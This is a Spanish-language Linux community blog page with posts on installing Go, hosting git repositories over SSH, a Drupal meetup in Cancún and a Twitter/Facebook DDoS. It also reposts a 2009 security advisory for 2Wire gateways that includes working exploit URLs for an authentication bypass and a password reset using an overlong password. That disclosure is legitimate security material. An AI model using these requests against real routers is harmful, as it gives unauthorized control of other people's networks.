Publicidad

Welcome

Comments

Technorati

Technorati Profile

Patrocinadores

Aprender Unix

Escrito por roa en BSD, FreeBSD

www.sign.io

Registrate y Obten una Shell Gratis

Nomas no abusen corriendo xploits

FreeBSD Mexico

Escrito por roa en BSD, FreeBSD, Mexico

www.freebsd.org.mx

Esta de Vuelta

Google Go

Escrito por k001 en Anuncios, Tutoriales, Linux, Ubuntu, Programacion

Esta semana Google introdujo un nuevo lenguage de programación llamado "Go".

Por lo cual vamos a ver como instalar el compilador para nuestro Ubuntu.

Paso 1: Editar nuestro .bashrc con lo siguiente:

export GOROOT=$HOME/go

export GOARCH=386

export GOOS=linux

export GOBIN=$HOME/bin

export PATH=$GOBIN:$PATH

Paso 2: Creamos un directorio llamado bin:

mkdir ~/bin

chmod 755 ~/bin

Paso 3: Instalamos los paquetes necesarios para compilar:

sudo apt-get install python-setuptools python-dev

sudo apt-get install mercurial

hg clone -r release https://go.googlecode.com/hg/ $GOROOT

sudo apt-get install bison gcc libc6-dev ed make

Paso 4: Construir el compilador:cd $GOROOT/src

./all.bashCon eso ya iniciará la compilación para tener nuestro compilador de “GO”.

Pronto daré ejemplos de codigo con dicho lenguaje.

Metodos Para Obtener el Codigo de Chromium-Based OS

Escrito por roa en Chromium OS

Metodos Para Obtener Chromium Os

Instrucciones de Compilacion de Chromium Os

Que es Google Chrome OS?

Escrito por roa en Chromium OS

Primer Cyber Cafe en Cancun con Linux

Escrito por roa en Anuncios, Linux

"Nos encontramos en: Av Politécnico SM514 M1 L1 local 3 Plaza Colibrí

Paseos del Caribe

Cancún, Quintana Roo, México"

http://tuuktux.homelinux.com/

Somos el primer café internet 100% Linux en Cancún. Aquí no tendrá problemas de virus de windows ni pantallas azules. La navegación en internet no tiene por qué ser un martirio, aquí tenemos filtrado de páginas para que los niños puedan navegar con seguridad. En todas las computadoras tenemos Kubuntu 9.04 Jaunty Jackalope actualizadas semanalmente.

Valdra la pena ir a visitarlo

Repositorios remotos/locales git con ssh

Escrito por yobageM en Tutoriales, Ssh, git

Actualmente existen varios servicios de hospedaje gratuito para repositorios git, el único requisito es que nuestros proyectos sean opensource. Pero si no queremos que algún proyecto sea público, ya sea porque X o Y razón, tendríamos que pagar una módica cantidad.

Aunque es un precio accesible, algunos si somos bien <del>pobres</del> codos y por otro lado, si tenemos otro lugar para hospedarlo nos podemos ahorrar esos loritos para otra ocasión. Esta receta puede llevarse a cabo tanto local como remotamente, para comenzar necesitaremos únicamente de git y un servidor ssh, los cuales en debian y derivados se instalan de esta manera: 

# apt-get install git-core openssh-server
Para crear los repositorios nos conectaremos al servidor remoto. En mi caso hice esto localmente y decidí agregar el usuario git, ya que en mi disco duro tengo una partición dedicada para /home. 
$ ssh git@git.kelevra.org
Y ejecutamos los siguientes comandos: 
$ mkdir test-project.git
 
$ cd test-project.git
 
$ git --bare init           # inicializamos el repositorio remoto
Con eso ya tenemos nuestro repositorio funcionando, ahora vamos a commitear algunos archivos: 
$ cd projects
 
$ mkdir test-project
 
$ cd test-project
 
$ git init                                                      # inicializamos el repositorio local
 
$ git remote add origin git@git.kelevra.org:test-project.git    # agregamos el repositorio remoto
 
$ echo 'Hello World!' > README
 
$ git add README
 
$ git commit -m 'first push'
 
$ git push origin master
Si todo ha ido bien, veremos algo como: 
git@git.kelevra.org's password:
 
Counting objects: 3, done.
 
Writing objects: 100% (3/3), 221 bytes, done.
 
Total 3 (delta 0), reused 0 (delta 0)
 
To git@git.kelevra.org:test-project.git
 
  • [new branch]      master -> master
Nuestro repositorio está trabajabdo bien, el password obviamente es el que le hayamos designado al usuario que creamos.

¿Pero que pasa si otros van a colaborar en mi proyecto?

Tienes dos opciones: La número uno sería que les hagas saber el password de dicho usuario, pero estar escribiendolo cada vez que vayamos a pushear algo es molesto.

La número dos y la más recomendable: Usar SSH-KEYS. A saber, existen dos tipos de llaves, DSA y RSA, sea cual sea nuestra elección, el procedimiento para crear un par de llaves es la siguiente: 

$ ssh-keygen -t dsa                                                             # cambiar por rsa según nuestra elección
 
Generating public/private dsa key pair.
 
Enter file in which to save the key (/home/kelevra/.ssh/id_dsa): .ssh/git_dsa   # no es obligatorio especificar ubicación
 
Enter passphrase (empty for no passphrase):                                     # escribimos una clave para usar la llave
 
Enter same passphrase again:                                                    # y la escribimos  de nuevo para confirmar
 
Your identification has been saved in .ssh/git_dsa.
 
Your public key has been saved in .ssh/git_dsa.pub.
Hemos generado una llave pública y una privada, la pública es la que copiaremos al servidor remoto: 
$ scp .ssh/id_dsa.pub git@git.kelevra.org:.ssh/authorized_keys2
 
git@git.kelevra.org's password:
 
id_dsa.pub                                    100%  608     0.6KB/s   00:00
Ahora ya no nos pedirá el password del usuario cada vez que hagamos push o nos conectemos para crear un nuevo repositorio, en su lugar nos pedirá la clave que le asignamos a nuestro par de llaves. Pero aún tenemos que escribir un password, sin embargo podemos usar ssh-agent que recordará por determinado tiempo nuestras claves, para iniciar este agente basta con teclear en la terminal: 
$ ssh-agent
 
SSH_AUTH_SOCK=/tmp/ssh-RwRst31999/agent.31999; export SSH_AUTH_SOCK;
 
SSH_AGENT_PID=32000; export SSH_AGENT_PID;
 
echo Agent pid 32000;
Ya una vez corriendo el agente agregamos nuestra llave: 
$ ssh-add .ssh/git_dsa
 
Enter passphrase for .ssh/git_dsa:
 
Identity added: .ssh/git_dsa (.ssh/git_dsa)
¡Y listo! Nos conectamos de nuevo vía ssh o hacemos otro push para comprobar que ya no nos pide el password del usuario y de la llave ssh. Y ahora si ya tenemos nuestro servidor de repositorios git bien sencishito y carismático

Gira Drupal Centroamérica 2009 en Cancún.

Escrito por k001 en (sin categoría)

Así es Josef Daberning esta en su gira Drupal Centroamérica 2009 y es un honor que está en Cancún y nos imparta la siguiente plática:

Drupal Práctica / Modulos

• CCK & Views

• Images

• Date & Calendar

• Panels

• WYSIWYG

Tipo: Taller / Charla informal

Ponente: Josef Daberning.

Lugar: Av. Nader No. 28 Mz 1 SM 2, Edificio Popolna 2do piso.

Fecha y Hora: 7 de Septiembre 6 p.m.

Requisitos: Laptop ( Windows, Linux, Mac), WAMP, MAMP, LAMP.

Nociones básicas: PHP, MySQL, CSS, HTML.

Mapa del lugar: http://tr.im/xQTo

Costo: Ganas de aprender y conocer mejor a Drupal, refrescos* y galletas*

Confirmación de lugares: roa@tucancunix.net y k001@tucancunix.net

Streaming: http://www.ustream.tv/channel/drupal-centroamerica-2009-cancun

*Cupo limitado

* Para compartir entre todos los asistentes.

------- Se cierra el registro con estas ultimas solicitudes ---------

2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET

Escrito por k001 en Seguridad 

DESCRIPTION
 
-----------------
 
There is an authentication bypass vulnerability in page=CD35_SETUP_01 that
 
allows you to set a new password even if the password was previously set.
 
By setting a new password with more than 512 characters the password gets
 
reset and next time you access the router you will be prompted for a new
 
password.
 
VULNERABLE
 
----------------
 
2Wire 2071 Gateway
 
2Wire 1800HW
 
2Wire 1701HG
 
Firmware
 
5.29.51
 
3.17.5
 
3.7.1
 
NOT VULNERABLE
 
--------------------
 
Firmware
 
5.29.135.5 or later
 
DISCLOSURE TIMELINE
 
-------------------------
 
03/27/2009 - 2wire Contacted no satisfactory response
 
07/11/2009 - Sent complete details to 2wire no response
 
07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response
 
08/02/2009 - Made public @ Defcon 17
 
EXPLOIT/POC
 
-----------------
 
Authentication Bypass - just use this page to set a new password
 
http://gateway.2wire.net?xslt?page=CD35_SETUP_01
 
Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv
 
Password Reset - using the same form but sending a password > 512 characters
 
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm
 
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
 
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
 
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
 
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
 
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
 
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
 
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
 
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
 
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
 
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
 
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
 
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
 
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
 
Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv
 
GREETS
 
------------
 
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
 
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa
 
Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield
 
Comunidad Underground de Mexico : https://www.underground.org.mx
 
h k m
 
http://www.hakim.ws
 
  1. milw0rm.com [2009-08-12]

Facebook y Twitter, fuera de servicio por un ataque

Escrito por roa en (sin categoría)

Millones de cibernautas alrededor del mundo trataron inútilmente de entrar a los sitios de las redes sociales de Twtter y Facebook, debido a una falla que presentan ambos portales.

Los sitios fueron objeto de un ataque del dipo DDOS (Distribuited Denial Of Service Attack, por sus siglas en inglés) o Ataque de Denegación del Servicio Distribuido.

El ataque, que inicio alrededor de las 8:00 horas y concluyó a las 9:55, es considerado uno de los más serios registrados hasta ahora por Twitter y ha evidenciado la popularidad de la red al interrumpir el servicio a millones de usuarios.

Algunos blogueros informan que Twitter alertó del ataque a los usuarios y que minutos antes de salir de la red publicó que se estaban defiendiendo del ataque y que esperaban regresar el servicio en breve.

Desde entonces se ha paralizado el servicio y funciona de manera intermitente en ambos casos.

Con este tipo de ataques, los “hackers” suelen ralentizar o anular el acceso a una red con la técnica de sobrecargar el tráfico hacia ella hasta saturar su ancho de banda.

“En la que de otra forma sería una feliz mañana de jueves, Twitter es objeto de un ataque de denegación de servicio” , reconocía también el responsable ejecutivo de la red, Biz Stone, en otro blog de la red.

"Ataques como estos son maliciosos esfuerzos orquestados para desarticular y deshabilitar servicios como los de la banca online, sistemas de pago con tarjeta y en este caso Twitter. Ahora nos estamos defendiendo de este ataque e iremos actualizando nuestro blog y más tarde investigaremos".

PCMag.com, entre otros medios de comunicación electrónicos, también informó hoy que hacia la misma hora se registraron problemas de acceso aFacebook, a lo que la red social contestó a través de un comunicado que está investigando lo ocurrido

Páginas: [1] 2 3 ... 9 10 11